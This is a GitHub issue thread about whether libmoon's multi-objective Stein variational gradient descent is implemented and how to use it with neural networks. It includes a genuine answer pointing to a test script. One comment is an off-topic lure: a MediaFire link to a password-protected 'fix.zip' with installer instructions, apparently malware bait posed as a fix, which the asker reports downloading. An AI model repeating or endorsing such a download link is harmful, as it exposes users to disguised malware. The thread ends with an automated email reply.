### ISSUE TITLE
Multi-Objective Stein Variational Gradient Descent

### ISSUE THREAD

**Issue by huangzhaor** [xzhang2523/libmoon#1]
Has the Multi Objective Stein Variational Gradient Descent not been fully implemented yet? I noticed that get_ svgd_gradient has been commented out in https://github.com/xzhang2523/libmoon/blob/3aa84700ea3eef47b88c081ca32211b5284de702/libmoon/solver/gradient/methods/moosvgd.py#L4.  And how should this algorithm be applied to neural networks?

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by huangzhaor** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."
I didn't see this download directory after downloading, only two unknown ![Uploading 屏幕截图 2024-08-26 223515.png…]()

**Comment by huangzhaor** [comment]
![Uploading 屏幕截图 2024-08-26 223515.png…]()

**Comment by YUYING07** [comment]
Yes. LibMOON supports neural networks for MOO-SVGD. We use get alpha_arr (the coefficients of MOO-SVGD gradients) instead of directly manipulating gradients (since it is slow). 
Considering using "https://github.com/xzhang2523/libmoon/blob/main/libmoon/tester/run_mtl_discrete.py" and set solver-name="moosvgd" to run moosvgd for neural networks.

**Comment by huangzhaor** [comment]
Thank you very much. I feel that you have already identified the differences between these methods and directly unified the gradient calculation, naming it the Jacobian matrix. I will carefully study your code again, as I have not delved so deeply into it before.

**Comment by YUYING07** [comment]
这是来自QQ邮箱的自动回复邮件。您好，我已经收到您的邮件~欢迎下次再邮~
